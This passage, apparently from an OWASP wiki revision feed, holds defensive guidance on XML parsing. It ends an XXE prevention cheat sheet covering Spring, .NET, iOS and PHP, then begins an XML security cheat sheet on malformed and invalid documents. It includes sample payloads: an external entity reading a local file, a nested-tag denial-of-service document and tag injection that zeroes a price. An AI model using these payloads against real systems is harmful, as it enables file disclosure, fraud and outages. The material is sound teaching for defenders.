For Spring OXM, this is referring to the use of org.springframework.oxm.jaxb.Jaxb2Marshaller. Note that the CVE for Spring OXM specifically indicates that 2 XML parsing situations are up to the developer to get right, and 2 are the responsibility of Spring and were fixed to address this CVE. Here's what they say:&lt;br /&gt;
&lt;br /&gt;
 '''Two situations developers must handle:'''&lt;br /&gt;
 For a DOMSource, the XML has already been parsed by user code and that code is responsible for protecting against XXE.&lt;br /&gt;
 For a StAXSource, the XMLStreamReader has already been created by user code and that code is responsible for protecting against XXE.&lt;br /&gt;
&lt;br /&gt;
 '''The issue Spring fixed:'''&lt;br /&gt;
 &lt;br /&gt;
 For SAXSource and StreamSource instances, Spring processed external entities by default thereby creating this vulnerability.&lt;br /&gt;
 Here's an example of using a StreamSource that was vulnerable, but is now safe, if you are using a fixed version of Spring OXM or Spring MVC:&lt;br /&gt;
 &lt;br /&gt;
  org.springframework.oxm.Jaxb2Marshaller marshaller = new org.springframework.oxm.jaxb.Jaxb2Marshaller();&lt;br /&gt;
  marshaller.unmarshal(new StreamSource(new StringReader(some_string_containing_XML)); // Must cast return Object to whatever type you are unmarshalling&lt;br /&gt;
&lt;br /&gt;
So, per the [http://pivotal.io/security/cve-2013-4152 Spring OXM CVE writeup], the above is now safe. But if you were to use a DOMSource or StAXSource instead, it would be up to you to configure those sources to be safe from XXE.&lt;br /&gt;
&lt;br /&gt;
==.NET==&lt;br /&gt;
&lt;br /&gt;
The following information for XXE in .NET is directly from James Jardine's excellent .NET XXE article:  https://www.jardinesoftware.net/2016/05/26/xxe-and-net/.&lt;br /&gt;
This newer article provides more recent and more detailed information than the older article from Microsoft on how to prevent XXE and XML Denial of Service in .NET: http://msdn.microsoft.com/en-us/magazine/ee335713.aspx.&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;width: 20%; align:center; text-align:left; border: 2px solid #4d953d; background-color:#F2F2F2; padding=2;&amp;quot; &lt;br /&gt;
|- style=&amp;quot;background-color: #4d953d; color: #FFFFFF;&amp;quot;&lt;br /&gt;
! XML Object !! Safe by Default?&lt;br /&gt;
|- style=&amp;quot;background-color: #FFFFFF;&amp;quot; &lt;br /&gt;
| '''XMLReader'''&lt;br /&gt;
| &lt;br /&gt;
|- style=&amp;quot;background-color: #FFFFFF;&amp;quot; &lt;br /&gt;
| Prior to 4.0&lt;br /&gt;
| Yes&lt;br /&gt;
|- style=&amp;quot;background-color: #FFFFFF;&amp;quot; &lt;br /&gt;
| 4.0 +&lt;br /&gt;
| Yes&lt;br /&gt;
|- style=&amp;quot;background-color: #FFFFFF;&amp;quot; &lt;br /&gt;
| '''XMLTextReader'''&lt;br /&gt;
| &lt;br /&gt;
|- style=&amp;quot;background-color: #FFFFFF;&amp;quot; &lt;br /&gt;
| Prior to 4.0&lt;br /&gt;
| No&lt;br /&gt;
|- style=&amp;quot;background-color: #FFFFFF;&amp;quot; &lt;br /&gt;
| 4.0 +&lt;br /&gt;
| No&lt;br /&gt;
|- style=&amp;quot;background-color: #FFFFFF;&amp;quot; &lt;br /&gt;
| '''XMLDocument'''&lt;br /&gt;
| &lt;br /&gt;
|- style=&amp;quot;background-color: #FFFFFF;&amp;quot; &lt;br /&gt;
| Prior to 4.6&lt;br /&gt;
| No&lt;br /&gt;
|- style=&amp;quot;background-color: #FFFFFF;&amp;quot; &lt;br /&gt;
| 4.6 +&lt;br /&gt;
| Yes&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== Prior to .NET 4.0 ===&lt;br /&gt;
&lt;br /&gt;
In .NET Framework versions prior to 4.0, DTD parsing behavior for XmlReader and XmlTextReader is controlled by the Boolean ProhibitDtd property found in the System.Xml.XmlReaderSettings and System.Xml.XmlTextReader classes. Set these values to true to disable inline DTDs completely:&lt;br /&gt;
&lt;br /&gt;
XmlReader:&lt;br /&gt;
&lt;br /&gt;
 XmlReaderSettings settings = new XmlReaderSettings(); &lt;br /&gt;
 settings.ProhibitDtd = true; // Not explicitly needed because the default is 'true'&lt;br /&gt;
 XmlReader reader = XmlReader.Create(stream, settings);&lt;br /&gt;
&lt;br /&gt;
XmlTextReader:&lt;br /&gt;
&lt;br /&gt;
 XmlTextReader reader = new XmlTextReader(stream);&lt;br /&gt;
 reader.ProhibitDtd = true;  // NEEDED because the default is FALSE!!&lt;br /&gt;
&lt;br /&gt;
XmlDocumentReader:&lt;br /&gt;
&lt;br /&gt;
XmlDocumentReader doesn't use a ProhibitDtd property. Instead you have to set its XmlResolver to null.&lt;br /&gt;
 &lt;br /&gt;
 static void LoadXML()&lt;br /&gt;
 {&lt;br /&gt;
   string xml = &amp;quot;&amp;lt;?xml version=\&amp;quot;1.0\&amp;quot; ?&amp;gt;&amp;lt;!DOCTYPE doc &lt;br /&gt;
 	[&amp;lt;!ENTITY win SYSTEM \&amp;quot;file:///C:/Users/user/Documents/testdata2.txt\&amp;quot;&amp;gt;]&lt;br /&gt;
 	&amp;gt;&amp;lt;doc&amp;gt;&amp;amp;win;&amp;lt;/doc&amp;gt;&amp;quot;;&lt;br /&gt;
 &lt;br /&gt;
   XmlDocument xmlDoc = new XmlDocument();&lt;br /&gt;
   xmlDoc.XmlResolver = null;   // Setting this to NULL disables DTDs - Its NOT null by default.&lt;br /&gt;
   xmlDoc.LoadXml(xml);&lt;br /&gt;
   Console.WriteLine(xmlDoc.InnerText);&lt;br /&gt;
   Console.ReadLine();&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
=== .NET 4.0 and later ===&lt;br /&gt;
&lt;br /&gt;
In .NET Framework version 4.0, DTD parsing behavior has been changed. The ProhibitDtd property has been deprecated in favor of the new DtdProcessing property. However, they didn't change the default settings so XmlTextReader is still vulnerable to XXE by default.&lt;br /&gt;
&lt;br /&gt;
Setting DtdProcessing to Prohibit causes the runtime to throw an exception if a &amp;lt;!DOCTYPE&amp;gt; element is present in the XML. To set this value yourself, it looks like this:&lt;br /&gt;
&lt;br /&gt;
 XmlReaderSettings settings = new XmlReaderSettings();&lt;br /&gt;
 settings.DtdProcessing = DtdProcessing.Prohibit;&lt;br /&gt;
 XmlReader reader = XmlReader.Create(stream, settings);&lt;br /&gt;
&lt;br /&gt;
Alternatively, you can set the DtdProcessing property to Ignore, which will not throw an exception on encountering a &amp;lt;!DOCTYPE&amp;gt; element but will simply skip over it and not process it. Finally, you can set DtdProcessing to Parse if you do want to allow and process inline DTDs.&lt;br /&gt;
&lt;br /&gt;
=== .NET 4.6 and later ===&lt;br /&gt;
&lt;br /&gt;
Starting with .NET 4.6, Microsoft finally changed the default behavior of XmlDocument to be safe from XXE by default, by setting the XmlResolver to null.&lt;br /&gt;
&lt;br /&gt;
For more details on all of this, please read [https://www.jardinesoftware.net/2016/05/26/xxe-and-net/ James Jardine's article].&lt;br /&gt;
&lt;br /&gt;
If you need to enable DTD processing, instructions on how to do so safely are described in detail in the [http://msdn.microsoft.com/en-us/magazine/ee335713.aspx referenced MSDN article].&lt;br /&gt;
&lt;br /&gt;
==iOS==&lt;br /&gt;
&lt;br /&gt;
===libxml2===&lt;br /&gt;
&lt;br /&gt;
iOS includes the C/C++ libxml2 library described above, so that guidance applies if you are using libxml2 directly. However, the version of libxml2 provided up through iOS6 is prior to version 2.9 of libxml2 (which protects against XXE by default).&lt;br /&gt;
&lt;br /&gt;
===NSXMLDocument===&lt;br /&gt;
&lt;br /&gt;
iOS also provides an NSXMLDocument type, which is built on top of libxml2. However, NSXMLDocument provides some additional protections against XXE that aren't available in libxml2 directly. Per the 'NSXMLDocument External Entity Restriction API' section of: http://developer.apple.com/library/ios/#releasenotes/Foundation/RN-Foundation-iOS/Foundation_iOS5.html:&lt;br /&gt;
&lt;br /&gt;
* iOS4 and earlier: All external entities are loaded by default.&lt;br /&gt;
&lt;br /&gt;
* iOS5 and later: Only entities that don't require network access are loaded. (which is safer)&lt;br /&gt;
&lt;br /&gt;
However, to completely disable XXE in an NSXMLDocument in any version of iOS you simply specify NSXMLNodeLoadExternalEntitiesNever when creating the NSXMLDocument.&lt;br /&gt;
&lt;br /&gt;
==PHP==&lt;br /&gt;
&lt;br /&gt;
Per [http://php.net/manual/en/function.libxml-disable-entity-loader.php the PHP documentation], the following should be set when using the default PHP XML parser in order to prevent XXE:&lt;br /&gt;
&lt;br /&gt;
libxml_disable_entity_loader(true);&lt;br /&gt;
&lt;br /&gt;
A description of how to abuse this in PHP is presented in a good [https://www.sensepost.com/blog/2014/revisting-xxe-and-abusing-protocols/ SensePost article] describing a cool PHP based XXE vulnerability that was fixed in Facebook.&lt;br /&gt;
&lt;br /&gt;
==Reference==&lt;br /&gt;
* FindBugs [https://find-sec-bugs.github.io/bugs.htm#XXE_SAXPARSER]&lt;br /&gt;
* XXEbugFind Tool [https://github.com/ssexxe/XXEBugFind]&lt;br /&gt;
&lt;br /&gt;
== Authors and Primary Editors  ==&lt;br /&gt;
&lt;br /&gt;
[[User:wichers|Dave Wichers]] - dave.wichers[at]owasp.org&amp;lt;br/&amp;gt;&lt;br /&gt;
[[User:Xiaoran_Wang|Xiaoran Wang]] - xiaoran[at]attacker-domain.com&amp;lt;br/&amp;gt;&lt;br /&gt;
James Jardine - james[at]jardinesoftware.com&lt;br /&gt;
&lt;br /&gt;
== Other Cheatsheets ==&lt;br /&gt;
&lt;br /&gt;
{{Cheatsheet_Navigation_Body}}&lt;br /&gt;
[[Category:Cheatsheets]]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224447</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224447"/>
				<updated>2016-12-21T21:27:26Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using not well formed documents.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities are to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though is not required: &lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coersive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up —and eventually deplete— the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closed the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to add one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and set the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10.  If the application processes only the first values provided for the id and the value without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1.000.000digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt; as well as the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The element name contains an irrelevant value but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain amount of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
Provided you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption  some values must be encoded using base64 . This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and will consider it valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are partially set for the element, which means that the information is probably tested using an application instead of the proposed sample schema. &lt;br /&gt;
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Negative numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Positive numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting that &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type may allow negative values, it might allow a negative result on the user’s account if an attacker provides a negative number. What you probably want to see in here to avoid that logical vulnerability is positiveInteger instead of integer. &lt;br /&gt;
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever using user controlled values as denominators in a division, developers should avoid allowing the number zero.  In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The price value will not trigger any errors when set at Infinity or NaN, because these values will not be valid. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should only be restricted to specific sets: traffic lights will have only three types of colors, only 12 months are available, and so on. It is possible that the schema has these restrictions in place for each element or attribute. This is the most perfect whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element month to 12 possible values:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
